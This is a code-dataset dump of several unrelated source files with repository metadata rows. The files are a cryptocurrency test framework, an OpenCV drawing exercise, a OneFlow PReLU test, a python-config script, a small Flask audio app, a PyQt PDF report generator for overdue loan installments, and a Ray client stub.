        fh = logging.FileHandler(self.options.tmpdir + '/test_framework.log')
        fh.setLevel(logging.DEBUG)
        # Create console handler to log messages to stderr. By default this logs only error messages, but can be configured with --loglevel.
        ch = logging.StreamHandler(sys.stdout)
        # User can provide log level as a number or string (eg DEBUG). loglevel was caught as a string, so try to convert it to an int
        ll = int(self.options.loglevel) if self.options.loglevel.isdigit() else self.options.loglevel.upper()
        ch.setLevel(ll)
        # Format logs the same as bitcoind's debug.log with microprecision (so log files can be concatenated and sorted)
        formatter = logging.Formatter(fmt='%(asctime)s.%(msecs)03d000 %(name)s (%(levelname)s): %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
        formatter.converter = time.gmtime
        fh.setFormatter(formatter)
        ch.setFormatter(formatter)
        # add the handlers to the logger
        self.log.addHandler(fh)
        self.log.addHandler(ch)
        if self.options.trace_rpc:
            rpc_logger = logging.getLogger("SosscoinRPC")
            rpc_logger.setLevel(logging.DEBUG)
            rpc_handler = logging.StreamHandler(sys.stdout)
            rpc_handler.setLevel(logging.DEBUG)
            rpc_logger.addHandler(rpc_handler)
    def _initialize_chain(self):
        """Initialize a pre-mined blockchain for use by the test.
        Create a cache of a 200-block-long chain (with wallet) for MAX_NODES
        Afterward, create num_nodes copies from the cache."""
        assert self.num_nodes <= MAX_NODES
        create_cache = False
        for i in range(MAX_NODES):
            if not os.path.isdir(os.path.join(self.options.cachedir, 'node' + str(i))):
                create_cache = True
                break
        if create_cache:
            self.log.debug("Creating data directories from cached datadir")
            # find and delete old cache directories if any exist
            for i in range(MAX_NODES):
                if os.path.isdir(os.path.join(self.options.cachedir, "node" + str(i))):
                    shutil.rmtree(os.path.join(self.options.cachedir, "node" + str(i)))
            # Create cache directories, run sosscoinds:
            for i in range(MAX_NODES):
                datadir = initialize_datadir(self.options.cachedir, i)
                args = [os.getenv("LITECOIND", "sosscoind"), "-server", "-keypool=1", "-datadir=" + datadir, "-discover=0"]
                if i > 0:
                    args.append("-connect=127.0.0.1:" + str(p2p_port(0)))
                self.nodes.append(TestNode(i, self.options.cachedir, extra_args=[], rpchost=None, timewait=None, binary=None, stderr=None, mocktime=self.mocktime, coverage_dir=None))
                self.nodes[i].args = args
                self.start_node(i)
            # Wait for RPC connections to be ready
            for node in self.nodes:
                node.wait_for_rpc_connection()
            # Create a 200-block-long chain; each of the 4 first nodes
            # gets 25 mature blocks and 25 immature.
            # Note: To preserve compatibility with older versions of
            # initialize_chain, only 4 nodes will generate coins.
            #
            # blocks are created with timestamps 10 minutes apart
            # starting from 2010 minutes in the past
            self.enable_mocktime()
            block_time = self.mocktime - (201 * 10 * 60)
            for i in range(2):
                for peer in range(4):
                    for j in range(25):
                        set_node_times(self.nodes, block_time)
                        self.nodes[peer].generate(1)
                        block_time += 10 * 60
                    # Must sync before next peer starts generating blocks
                    sync_blocks(self.nodes)
            # Shut them down, and clean up cache directories:
            self.stop_nodes()
            self.nodes = []
            self.disable_mocktime()
            # Strip run-specific files so the cache is reusable across runs.
            for i in range(MAX_NODES):
                os.remove(log_filename(self.options.cachedir, i, "debug.log"))
                os.remove(log_filename(self.options.cachedir, i, "db.log"))
                os.remove(log_filename(self.options.cachedir, i, "peers.dat"))
                os.remove(log_filename(self.options.cachedir, i, "fee_estimates.dat"))
        for i in range(self.num_nodes):
            from_dir = os.path.join(self.options.cachedir, "node" + str(i))
            to_dir = os.path.join(self.options.tmpdir, "node" + str(i))
            shutil.copytree(from_dir, to_dir)
            initialize_datadir(self.options.tmpdir, i) # Overwrite port/rpcport in bitcoin.conf
    def _initialize_chain_clean(self):
        """Initialize empty blockchain for use by the test.
        Create an empty blockchain and num_nodes wallets.
        Useful if a test case wants complete control over initialization."""
        for i in range(self.num_nodes):
            initialize_datadir(self.options.tmpdir, i)
class ComparisonTestFramework(BitcoinTestFramework):
    """Framework for p2p comparison testing.
    Node 0 runs the binary under test; any additional nodes run the
    reference binary:
    - 1 binary: test binary only
    - 2 binaries: 1 test binary, 1 ref binary
    - n>2 binaries: 1 test binary, n-1 ref binaries"""
    def set_test_params(self):
        # Default: a clean chain with one test node and one reference node.
        self.setup_clean_chain = True
        self.num_nodes = 2
    def add_options(self, parser):
        # Both options fall back to the LITECOIND env var, then "sosscoind".
        default_binary = os.getenv("LITECOIND", "sosscoind")
        parser.add_option("--testbinary", dest="testbinary",
                          default=default_binary,
                          help="sosscoind binary to test")
        parser.add_option("--refbinary", dest="refbinary",
                          default=default_binary,
                          help="sosscoind binary to use for reference nodes (if any)")
    def setup_network(self):
        # Whitelist localhost on every node unless the test supplied its own args.
        if hasattr(self, "extra_args"):
            node_args = self.extra_args
        else:
            node_args = [['-whitelist=127.0.0.1']] * self.num_nodes
        binaries = [self.options.testbinary]
        binaries += [self.options.refbinary] * (self.num_nodes - 1)
        self.add_nodes(self.num_nodes, node_args, binary=binaries)
        self.start_nodes()
class SkipTest(Exception):
    """This exception is raised to skip a test.
    main() catches it, logs the reason and exits with TEST_EXIT_SKIPPED."""
    def __init__(self, message):
        # Stored as an attribute because main() reports the reason via e.message.
        self.message = message
| [
"38661023+zuka2512@users.noreply.github.com"
] | 38661023+zuka2512@users.noreply.github.com |
f693ddebd56136aac4d222c496128c1c7233c17b | 108fac5bd6bc1893953768f8c3aff4b359e2536b | /FreeCodeCamp/01/draw.py | 1af7fa9345e6018816fd9a2abe38d0018bed5ac8 | [] | no_license | rafael-miranda10/freecodecamp_python_opencv | 2bdbe0326e9d6732674aea405d6db70dd561b9ad | 0f52f2a739c4999a375a3e522a561ad74108ea9f | refs/heads/main | 2023-06-02T20:57:56.256127 | 2021-06-19T18:30:49 | 2021-06-19T18:30:49 | 378,475,324 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,072 | py | import cv2 as cv
import numpy as np
blank = np.zeros((500,500,3), dtype='uint8')
cv.imshow('Blank', blank)
img = cv.imread('photos/3.jpg')
cv.imshow('Image', img)
#1 - Paint the image a certain colour
#blank[:] = 0,0,255
#blank[200:300, 300:400] = 255,0,0
#cv.imshow('Green', blank)
#2 - Draw a Rectangle
#thickness é referente a linha ou prennchimento
#thickness=2 -> tamanho linha
#thickness=cv.FILLED -> preenchimento total
#cv.rectangle(blank, (0,0), (250,500), (0,255,0), thickness=cv.FILLED )
#cv.rectangle(blank, (0,0), (blank.shape[1]//2, blank.shape[0]//2), (0,255,0), thickness=cv.FILLED )
#cv.imshow('Rectangle', blank)
# 3 draw a circle
#cv.circle(blank, (blank.shape[1]//2, blank.shape[0]//2), 40 , (0,0,255),thickness=-1 )
#cv.imshow('Circle', blank)
# 4 Draw a line
#cv.line(blank, (0,0), (blank.shape[1]//2, blank.shape[0]//2), (255,255,255), thickness=3 )
#cv.imshow('Line', blank)
#5 Write text
cv.putText(blank, 'Hello!', (255,255), cv.FONT_HERSHEY_TRIPLEX, 1.0, (255,0,0), 2)
cv.imshow('Text', blank)
cv.waitKey(0)
#PAREI NO MINUTO 31:55 | [
"43150739+rafael-miranda10@users.noreply.github.com"
] | 43150739+rafael-miranda10@users.noreply.github.com |
3c10deb4991c6f62d15eb76b3a5f1518872491c7 | 112cdec2db27fe43f18f37a4ba785252b323f469 | /python/oneflow/test/modules/test_prelu.py | 351b9aa625a26cfaf11e626ea54d2881e37349f5 | [
"Apache-2.0"
] | permissive | flowone/oneflow | 6be8da189ac6b430d4c4b168afe8184d2db64556 | 3d24b37500292f332727ba69ef86d4809bf6ad67 | refs/heads/master | 2023-07-19T14:12:04.943438 | 2021-09-14T08:32:08 | 2021-09-14T08:32:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,641 | py | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
from collections import OrderedDict
import numpy as np
from automated_test_util import *
from test_util import GenArgList
import oneflow as flow
import oneflow.unittest
@flow.unittest.skip_unless_1n1d()
class TestPReLU(flow.unittest.TestCase):
    """Autotest-driven cases for nn.PReLU on randomly generated tensors.
    NOTE(review): the `x | nothing()` expressions are part of the autotest
    DSL (presumably: randomly omit the argument) — see automated_test_util.
    """
    @autotest()
    def test_prelu_4dim_module_with_random_data(test_case):
        """PReLU on a random 4-D tensor; dim1 is fixed at 3 so that
        num_parameters=3 (one weight per channel) is always valid."""
        device = random_device()
        x = random_pytorch_tensor(ndim=4, dim1=3).to(device)
        m = torch.nn.PReLU(
            num_parameters=3 | nothing(), init=random().to(float) | nothing(),
        )
        m.to(device)
        m.train(random())
        y = m(x)
        return y
    @autotest()
    def test_prelu_2dim_module_with_random_data(test_case):
        """Same as above but on a random 2-D tensor."""
        device = random_device()
        x = random_pytorch_tensor(ndim=2, dim1=3).to(device)
        m = torch.nn.PReLU(
            num_parameters=3 | nothing(), init=random().to(float) | nothing(),
        )
        m.to(device)
        m.train(random())
        y = m(x)
        return y
# Run the test cases when this module is executed directly.
if __name__ == "__main__":
    unittest.main()
| [
"noreply@github.com"
] | flowone.noreply@github.com |
23d3b4c59de4b0bd6da14a5bcc75102bbcc7d84e | a12c1fd7e29891192f295f21823b90b10dc08885 | /Backend/env/bin/python-config | 87aa835ffe5beecf29d4152416ad88c4bff3f5d1 | [] | no_license | DaVinciTachyon/Swiftly | 35bb892550c43a9f1df800680956b15451e720c6 | f815bbb75e72aad14ac73abf87eeda85aecf7ca8 | refs/heads/master | 2020-04-21T02:26:05.065838 | 2019-04-12T10:06:31 | 2019-04-12T10:06:31 | 169,254,430 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,359 | #!/home/darts/Documents/Swiftly/Backend/env/bin/python
import sys
import getopt
import sysconfig
# Long options understood by this script; extended below according to the
# version of the interpreter actually running it.
valid_opts = ['prefix', 'exec-prefix', 'includes', 'libs', 'cflags',
              'ldflags', 'help']
if sys.version_info >= (3, 2):
    # insert(-1, ...) places 'extension-suffix' just before 'help'.
    valid_opts.insert(-1, 'extension-suffix')
    valid_opts.append('abiflags')
if sys.version_info >= (3, 3):
    valid_opts.append('configdir')
def exit_with_usage(code=1):
    """Write a usage line listing every supported --flag to stderr, then
    terminate the process with the given exit code (default 1 = error)."""
    flag_list = '|'.join('--'+opt for opt in valid_opts)
    sys.stderr.write("Usage: {0} [{1}]\n".format(sys.argv[0], flag_list))
    sys.exit(code)
# Parse only long options; any unrecognised flag triggers the usage message.
try:
    opts, args = getopt.getopt(sys.argv[1:], '', valid_opts)
except getopt.error:
    exit_with_usage()
if not opts:
    exit_with_usage()
pyver = sysconfig.get_config_var('VERSION')
getvar = sysconfig.get_config_var
opt_flags = [flag for (flag, val) in opts]
if '--help' in opt_flags:
    exit_with_usage(code=0)
# Print the requested build-configuration values, one block per flag,
# in the order the flags were given on the command line.
for opt in opt_flags:
    if opt == '--prefix':
        print(sysconfig.get_config_var('prefix'))
    elif opt == '--exec-prefix':
        print(sysconfig.get_config_var('exec_prefix'))
    elif opt in ('--includes', '--cflags'):
        # Both the generic and the platform-specific include directories.
        flags = ['-I' + sysconfig.get_path('include'),
                 '-I' + sysconfig.get_path('platinclude')]
        if opt == '--cflags':
            flags.extend(getvar('CFLAGS').split())
        print(' '.join(flags))
    elif opt in ('--libs', '--ldflags'):
        # abiflags may be absent on older interpreters; default to ''.
        abiflags = getattr(sys, 'abiflags', '')
        libs = ['-lpython' + pyver + abiflags]
        libs += getvar('LIBS').split()
        libs += getvar('SYSLIBS').split()
        # add the prefix/lib/pythonX.Y/config dir, but only if there is no
        # shared library in prefix/lib/.
        if opt == '--ldflags':
            if not getvar('Py_ENABLE_SHARED'):
                libs.insert(0, '-L' + getvar('LIBPL'))
            if not getvar('PYTHONFRAMEWORK'):
                libs.extend(getvar('LINKFORSHARED').split())
        print(' '.join(libs))
    elif opt == '--extension-suffix':
        # Older interpreters expose the suffix under 'SO' instead of 'EXT_SUFFIX'.
        ext_suffix = sysconfig.get_config_var('EXT_SUFFIX')
        if ext_suffix is None:
            ext_suffix = sysconfig.get_config_var('SO')
        print(ext_suffix)
    elif opt == '--abiflags':
        if not getattr(sys, 'abiflags', None):
            exit_with_usage()
        print(sys.abiflags)
    elif opt == '--configdir':
        print(sysconfig.get_config_var('LIBPL'))
"davincitachyon@github.com"
] | davincitachyon@github.com | |
fedbec9da50d2695420b0de574fae1ca2f092485 | 18cd0573f59d44a7cba7c8811bd76f42ddbc1870 | /reg2.py | 15fe93adb56bf92ac8b150fa1d0d0a715e70a00e | [] | no_license | mikronavt/pycodes | 775e23a10263e963b153e001bb6e9e426ea90acb | cc9764ff89711034ff47e991fe8f8cf964e73d89 | refs/heads/master | 2020-12-24T09:55:10.362058 | 2016-11-09T07:12:16 | 2016-11-09T07:12:16 | 73,259,956 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 169 | py | import sys
import re
for line in sys.stdin:
line = line.rstrip()
p = re.compile(r'\bcat\b')
m = re.search(p, line)
if m is not None:
print(line) | [
"chgb-tol@ya.ru"
] | chgb-tol@ya.ru |
e2f58821bdc51384bfad58f2da79ba7208b170c6 | a114b97fbc3b1a46e5c7f0f9053611205c98ebf4 | /scenarios/testsenery1.0/kongfen/空分测试与统计/change3.py | 95a988d7f5fa96a66e38432ae300427577675791 | [] | no_license | forme12/qualnet- | d4a76f0916623227dfd51b4ed6d23af052e3a69d | 4d8fd82b9d16633f8773f7953c8cc2e0b60a230f | refs/heads/master | 2021-11-03T08:47:08.491807 | 2019-03-25T11:40:26 | 2019-03-25T11:40:26 | 177,569,714 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 919 | py | import os
f = open ('kongfen1.0.app')
lines = f.readlines()
f.close()
for line in lines:
if(line.find('CBR 55 76 1000 512 10 ') == 0):
line = 'CBR 55 76 1000 512 10 %s' % ('30MS 1S 50S Unicast 10S PRECEDENCE 0 ',) + '\n'
if(line.find('CBR 54 80 1000 512 10 ') == 0):
line = 'CBR 54 80 1000 512 10 %s' % ('30MS 1S 50S Unicast 10S PRECEDENCE 0 ',) + '\n'
if(line.find('CBR 30 1 1000 512 10 ') == 0):
line = 'CBR 30 1 1000 512 10 %s' % ('30MS 1S 50S Unicast 10S PRECEDENCE 0 ',) + '\n'
if(line.find('CBR 34 9 1000 512 10 ') == 0):
line = 'CBR 34 9 1000 512 10 %s' % ('30MS 1S 50S Unicast 10S PRECEDENCE 0 ',) + '\n'
#rs = line.rstrip('\n')
#newname=rs.replace(rs,'CBR 55 76 1000 512 10 40MS 1S 50S Unicast 10S PRECEDENCE 0')
newfile = open('t1.app','a')
newfile.write(line)
newfile.close()
os.unlink('kongfen1.0.app')
os.rename('t1.app','kongfen1.0.app') | [
"2081444098@qq.com"
] | 2081444098@qq.com |
16e32f627660172ba62c9c8293a314dfcb39e346 | 436a9df91964440654da2af8f52d65e28f3a9347 | /flask_server.py | 300040c4c12178f36c469f4f768944ee91f570f5 | [] | no_license | ras9841/TerMINIONator | f7fd481a8db92de5b50086ce736a2b1c32fd2523 | 9dbbfadb09677fd564f1441933290eb0745c3a6e | refs/heads/master | 2021-01-22T06:07:05.597614 | 2017-02-12T16:50:11 | 2017-02-12T16:50:11 | 81,735,066 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 561 | py | from flask import Flask
from flask import render_template, request, url_for, redirect
import sys, os
from record import record_audio
from text_analysis import run_analysis
app = Flask(__name__)
@app.route('/record', methods=['GET', 'POST'])
def record():
record_audio(5.0)
os.system("sh speach_text.sh")
uinput = run_analysis()
return redirect(url_for('index', uinput=uinput))
@app.route('/')
@app.route('/<uinput>')
def index(uinput = None):
return render_template('index.html', uinput=uinput)
if __name__ == "__main__":
app.run()
| [
"ras9841@rit.edu"
] | ras9841@rit.edu |
11f73fbe56bc17b3b0a1fd41fe7b785b16cb6ab0 | 4a6d784fd44b57d6b2aabae9d2381884cc880aea | /w_form_cuotas_vencidas_30dias.py | 53a4658d5a415681d07bdf21ca61bb9eac419f7d | [] | no_license | blueautomatic/Slam_Sistema_creditos | 0e46c2f23d396793122739f838073eff77df88e3 | 7eb20a90abce53f10dcd18e3d47e9a5f330acbbd | refs/heads/master | 2020-03-26T19:13:36.634824 | 2018-02-05T15:46:42 | 2018-02-05T15:46:42 | 145,254,325 | 0 | 0 | null | 2018-08-18T21:37:23 | 2018-08-18T21:37:23 | null | UTF-8 | Python | false | false | 13,010 | py | import sys,datetime,os
from PyQt5.QtWidgets import QApplication,QDialog,QMessageBox, QTableWidgetItem
from PyQt5 import uic
from form_cuotas_vencidas_30dias import Ui_form_cuotas_vencidas_30dias
from N_cliente import N_datos_personales_cliente, N_party_address, N_party_otros, N_datos_laborales, N_party_garante,N_party_cliente, N_party_contacto
from N_creditos import N_creditos
from N_cuotas import N_cuotas
from PyQt5.QtCore import pyqtRemoveInputHook
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import letter
from reportlab.lib.pagesizes import A4
from reportlab.lib.styles import getSampleStyleSheet,ParagraphStyle
from reportlab.platypus import Spacer, SimpleDocTemplate, Table, TableStyle
from reportlab.platypus import Paragraph, Image
from reportlab.lib import colors
from PyQt5.QtWidgets import QFileDialog
from E_configuracion import configuracion
import subprocess
class Cuotas_vencidas_30dias(QDialog):
    """Dialog that generates PDF reports of installments overdue by 30/60/90 days."""
    # NOTE(review): these are *class-level* attributes, created once at class
    # definition time and shared by every instance until the methods rebind
    # them through self.…; per-instance initialisation in __init__ would be
    # safer — confirm this sharing is intentional.
    obj_form = Ui_form_cuotas_vencidas_30dias()
    listado_cuotas_30_dias = list()
    listado_cuotas_60_dias = list()
    listado_cuotas_90_dias = list()
    def __init__(self):
        """Build the dialog UI and wire each report button to its generator."""
        QDialog.__init__(self)
        self.obj_form = Ui_form_cuotas_vencidas_30dias()
        self.obj_form.setupUi(self)
        self.obj_form.boton_generar.clicked.connect(self.generar_30dias)
        self.obj_form.boton_generar_60_dias.clicked.connect(self.generar_60dias)
        self.obj_form.boton_generar_90_dias.clicked.connect(self.generar_90dias)
    def generar_30dias(self):
        """Generate the "installments overdue up to 30 days" PDF report.

        Fetches the overdue installments, lays out a banner + table with
        ReportLab, writes the PDF under <config ruta>/pdf/listados/... and
        opens it with the platform's default viewer.
        """
        obj_N_cuotas = N_cuotas(1)
        self.listado_cuotas_30_dias = obj_N_cuotas.lista_cuotas_venc_30_dias()
        styleSheet=getSampleStyleSheet()
        # Letterhead image for the report banner.
        img=Image("cabezal.png",250,75)
        img.hAlign = "LEFT"
        otro_estilo= ParagraphStyle('',fontSize = 20,textColor = '#000',leftIndent = 200,rightIndent = 50)
        style_barra= ParagraphStyle('',fontSize = 13,textColor = '#000',backColor='#f5f5f5',borderColor ='#a3a3a3',borderWidth = 1,borderPadding = (1, 2, 5))
        texto_principal = ""
        estilo_texto = ParagraphStyle('',
        fontSize = 22,
        alignment = 0,
        spaceBefore = 0,
        spaceAfter = 0,
        #backColor = '#fff',
        textColor = '#999',
        leftIndent = 10 )
        h = Paragraph( texto_principal, estilo_texto)
        banner = [ [ img,h ] ]
        options = QFileDialog.Options()
        story=[]
        ban = Table( banner, colWidths=300, rowHeights=10)
        ban.setStyle([ ('ALIGN',(0,0),(0,0),'LEFT'),('ALIGN',(0,0),(1,0),'LEFT'), ('VALIGN',(0,0),(1,0),'TOP'),
        ('TEXTCOLOR',(0,1),(0,-1), colors.blue) ])
        story.append(ban)
        story.append(Spacer(0,-17))
        P= Paragraph("<b>Reportes</b> ",otro_estilo)
        story.append(P)
        story.append(Spacer(0,25))
        P=Paragraph("<b>Cuotas vencidas hasta 30 dias</b> " + str(datetime.datetime.now()),style_barra)
        story.append(P)
        story.append(Spacer(0,25))
        # Table columns: last name, first name, DNI, credit number, installment number, amount.
        integrantes = [[Paragraph('''<font size=12> <b> </b></font>''',styleSheet["BodyText"])],
        ['Apellido', 'Nombre', 'D.N.I:', 'Nro Crédito:','Nro Cuota','Monto']]
        for item in self.listado_cuotas_30_dias:
            # Amount owed = first-due-date amount plus accrued penalties.
            monto_adeudado = float(item.importe_primer_venc) + float(item.punitorios)
            obj_N_credito = N_creditos(1)
            obj_credito = obj_N_credito.buscar_credito_por_nro_credito(item.nro_credito)
            obj_N_datos_personales_cliente = N_datos_personales_cliente()
            obj_party = obj_N_datos_personales_cliente.buscar_party_party_por_id(obj_credito.id_party)
            # NOTE(review): unlike generar_60dias/generar_90dias this does NOT
            # round monto_adeudado to 2 decimals — confirm whether intended.
            integrantes.append([str(obj_party.apellido), str(obj_party.nombre), str(obj_party.nro_doc) ,str(item.nro_credito),str(item.nro_cuota), str(monto_adeudado)])
        t=Table(integrantes, (150,135, 100, 55, 55,55))
        t.setStyle(TableStyle([
        ('INNERGRID', (0,1), (-1,-1), 0.25, colors.black),
        ('BOX', (0,1), (-1,-1), 0.25, colors.black),
        ('BACKGROUND',(0,1),(-1,1),colors.lightgrey)
        ]))
        story.append(t)
        story.append(Spacer(0,15))
        # Output directory is namespaced by year_month so reports accumulate per period.
        obj_config = configuracion()
        cadena = obj_config.ruta()
        file_path = cadena + "/pdf/listados/list_morosos_30dias"+str(datetime.date.today().year)+"_"+str(datetime.date.today().month)
        if not os.path.exists(file_path):
            os.makedirs(file_path)
        doc=SimpleDocTemplate(file_path +"/listado_de_morosos_30dias.pdf")
        doc.build(story )
        msgBox = QMessageBox()
        msgBox.setWindowTitle("Estado de Listado")
        msgBox.setText("El Listado se ha generado correctamente : ticket listado_de_morosos_30dias.pdf")
        msgBox.exec_()
        # Open the generated PDF with the platform's default viewer.
        if sys.platform == 'linux':
            subprocess.call(["xdg-open", file_path +"/listado_de_morosos_30dias.pdf"])
        else:
            os.startfile( file_path +"/listado_de_morosos_30dias.pdf")
    def generar_60dias(self):
        """Generate the "installments overdue up to 60 days" PDF report.

        Same layout as generar_30dias, but sourced from
        lista_cuotas_venc_60_dias("slam") and with amounts rounded to 2 decimals.
        """
        obj_N_cuotas = N_cuotas(1)
        self.listado_cuotas_60_dias = obj_N_cuotas.lista_cuotas_venc_60_dias("slam")
        styleSheet=getSampleStyleSheet()
        # Letterhead image for the report banner.
        img=Image("cabezal.png",250,75)
        img.hAlign = "LEFT"
        otro_estilo= ParagraphStyle('',fontSize = 20,textColor = '#000',leftIndent = 200,rightIndent = 50)
        style_barra= ParagraphStyle('',fontSize = 13,textColor = '#000',backColor='#f5f5f5',borderColor ='#a3a3a3',borderWidth = 1,borderPadding = (1, 2, 5))
        texto_principal = ""
        estilo_texto = ParagraphStyle('',
        fontSize = 22,
        alignment = 0,
        spaceBefore = 0,
        spaceAfter = 0,
        #backColor = '#fff',
        textColor = '#999',
        leftIndent = 10 )
        h = Paragraph( texto_principal, estilo_texto)
        banner = [ [ img,h ] ]
        options = QFileDialog.Options()
        story=[]
        ban = Table( banner, colWidths=300, rowHeights=10)
        ban.setStyle([ ('ALIGN',(0,0),(0,0),'LEFT'),('ALIGN',(0,0),(1,0),'LEFT'), ('VALIGN',(0,0),(1,0),'TOP'),
        ('TEXTCOLOR',(0,1),(0,-1), colors.blue) ])
        story.append(ban)
        story.append(Spacer(0,10))
        P= Paragraph("<b>Reportes</b> ",otro_estilo)
        story.append(P)
        story.append(Spacer(0,25))
        P=Paragraph("<b>Cuotas vencidas hasta 60 dias</b> "+ str(datetime.datetime.now()),style_barra)
        story.append(P)
        story.append(Spacer(0,25))
        # Table columns: last name, first name, DNI, credit number, installment number, amount.
        integrantes = [[Paragraph('''<font size=12> <b> </b></font>''',styleSheet["BodyText"])],
        ['Apellido', 'Nombre', 'D.N.I:', 'Nro Crédito:','Nro Cuota','Monto']]
        for item in self.listado_cuotas_60_dias:
            # Amount owed = first-due-date amount plus accrued penalties.
            monto_adeudado = float(item.importe_primer_venc) + float(item.punitorios)
            obj_N_credito = N_creditos(1)
            obj_credito = obj_N_credito.buscar_credito_por_nro_credito(item.nro_credito)
            obj_N_datos_personales_cliente = N_datos_personales_cliente()
            obj_party = obj_N_datos_personales_cliente.buscar_party_party_por_id(obj_credito.id_party)
            integrantes.append([str(obj_party.apellido), str(obj_party.nombre), str(obj_party.nro_doc) ,str(item.nro_credito),str(item.nro_cuota), str(round(monto_adeudado,2))])
        t=Table(integrantes, (150,135, 100, 55, 55,55))
        t.setStyle(TableStyle([
        ('INNERGRID', (0,1), (-1,-1), 0.25, colors.black),
        ('BOX', (0,1), (-1,-1), 0.25, colors.black),
        ('BACKGROUND',(0,1),(-1,1),colors.lightgrey)
        ]))
        story.append(t)
        story.append(Spacer(0,15))
        # Output directory is namespaced by year_month so reports accumulate per period.
        obj_config = configuracion()
        cadena = obj_config.ruta()
        file_path = cadena + "/pdf/listados/list_morosos_60dias"+str(datetime.date.today().year)+"_"+str(datetime.date.today().month)
        if not os.path.exists(file_path):
            os.makedirs(file_path)
        doc=SimpleDocTemplate(file_path +"/listado_de_morosos_60dias.pdf")
        doc.build(story )
        msgBox = QMessageBox()
        msgBox.setWindowTitle("Estado de Listado")
        msgBox.setText("El Listado se ha generado correctamente : Listado listado_de_morosos_60dias.pdf")
        msgBox.exec_()
        # Open the generated PDF with the platform's default viewer.
        if sys.platform == 'linux':
            subprocess.call(["xdg-open", file_path +"/listado_de_morosos_60dias.pdf"])
        else:
            os.startfile( file_path +"/listado_de_morosos_60dias.pdf")
def generar_90dias(self):
obj_N_cuotas = N_cuotas(1)
self.listado_cuotas_90_dias = obj_N_cuotas.lista_cuotas_venc_90_dias("slam")
styleSheet=getSampleStyleSheet()
#pyqtRemoveInputHook()
#import pdb; pdb.set_trace()
img=Image("cabezal.png",250,75)
img.hAlign = "LEFT"
#pyqtRemoveInputHook()
#import pdb; pdb.set_trace()
otro_estilo= ParagraphStyle('',fontSize = 20,textColor = '#000',leftIndent = 200,rightIndent = 50)
style_barra= ParagraphStyle('',fontSize = 13,textColor = '#000',backColor='#f5f5f5',borderColor ='#a3a3a3',borderWidth = 1,borderPadding = (1, 2, 5))
texto_principal = ""
estilo_texto = ParagraphStyle('',
fontSize = 22,
alignment = 0,
spaceBefore = 0,
spaceAfter = 0,
#backColor = '#fff',
textColor = '#999',
leftIndent = 10 )
h = Paragraph( texto_principal, estilo_texto)
banner = [ [ img,h ] ]
options = QFileDialog.Options()
story=[]
ban = Table( banner, colWidths=300, rowHeights=10)
ban.setStyle([ ('ALIGN',(0,0),(0,0),'LEFT'),('ALIGN',(0,0),(1,0),'LEFT'), ('VALIGN',(0,0),(1,0),'TOP'),
('TEXTCOLOR',(0,1),(0,-1), colors.blue) ])
story.append(ban)
story.append(Spacer(0,-17))
P= Paragraph("<b>Reportes</b> ",otro_estilo)
story.append(P)
story.append(Spacer(0,25))
P=Paragraph("<b>Cuotas vencidas hasta 90 dias</b> " + str(datetime.datetime.now()),style_barra)
story.append(P)
story.append(Spacer(0,25))
#nombre apellido dni Nro prestamo nro cuota monto
integrantes = [[Paragraph('''<font size=12> <b> </b></font>''',styleSheet["BodyText"])],
['Apellido', 'Nombre', 'D.N.I:', 'Nro Crédito:','Nro Cuota','Monto']]
for item in self.listado_cuotas_90_dias:
monto_adeudado = float(item.importe_primer_venc) + float(item.punitorios)
obj_N_credito = N_creditos(1)
obj_credito = obj_N_credito.buscar_credito_por_nro_credito(item.nro_credito)
obj_N_datos_personales_cliente = N_datos_personales_cliente()
obj_party = obj_N_datos_personales_cliente.buscar_party_party_por_id(obj_credito.id_party)
integrantes.append([str(obj_party.apellido), str(obj_party.nombre), str(obj_party.nro_doc) ,str(item.nro_credito),str(item.nro_cuota), str(round(monto_adeudado,2))])
t=Table(integrantes, (150,155, 100, 55, 55,55))
t.setStyle(TableStyle([
('INNERGRID', (0,1), (-1,-1), 0.25, colors.black),
('BOX', (0,1), (-1,-1), 0.25, colors.black),
('BACKGROUND',(0,1),(-1,1),colors.lightgrey)
]))
story.append(t)
story.append(Spacer(0,15))
obj_config = configuracion()
cadena = obj_config.ruta()
file_path = cadena + "/pdf/listados/listado_de_morosos_90dias"+str(datetime.date.today().year)+"_"+str(datetime.date.today().month)
if not os.path.exists(file_path):
os.makedirs(file_path)
doc=SimpleDocTemplate(file_path +"/listado_de_morosos_90dias.pdf")
doc.build(story )
msgBox = QMessageBox()
msgBox.setWindowTitle("Estado de Listado")
msgBox.setText("El Listado se ha generado correctamente : Listado listado_de_morosos_90dias.pdf")
msgBox.exec_()
if sys.platform == 'linux':
subprocess.call(["xdg-open", file_path +"/listado_de_morosos_90dias.pdf"])
else:
os.startfile( file_path +"/listado_de_morosos_90dias.pdf")
#app = QApplication(sys.argv)
#dialogo= Cuotas_vencidas_30dias()
#dialogo.show()
#app.exec_()
| [
"lriccombene@gmail.com"
] | lriccombene@gmail.com |
00380198139ffebd0a0320d358b25b1b10ed5d66 | 9b8367ae9b5e9a7b9864c399064950bf6c2f8a12 | /python/ray/experimental/client/api.py | 66ec61c17ab21af933b936f249b82e55e3f10b65 | [
"Apache-2.0",
"MIT"
] | permissive | oliverhu/ray | c69f9c48a7869b0231ccf6c88e3252ba579b49d3 | 2f8e308444bbf552d6bf8d3167d694847e85ec63 | refs/heads/master | 2023-02-17T02:25:26.564474 | 2020-12-10T01:19:36 | 2020-12-10T01:19:36 | 295,881,584 | 0 | 1 | Apache-2.0 | 2021-01-05T05:19:30 | 2020-09-16T00:30:49 | Python | UTF-8 | Python | false | false | 4,472 | py | # This file defines an interface and client-side API stub
# for referring either to the core Ray API or the same interface
# from the Ray client.
#
# In tandem with __init__.py, we want to expose an API that's
# close to `python/ray/__init__.py` but with more than one implementation.
# The stubs in __init__ should call into a well-defined interface.
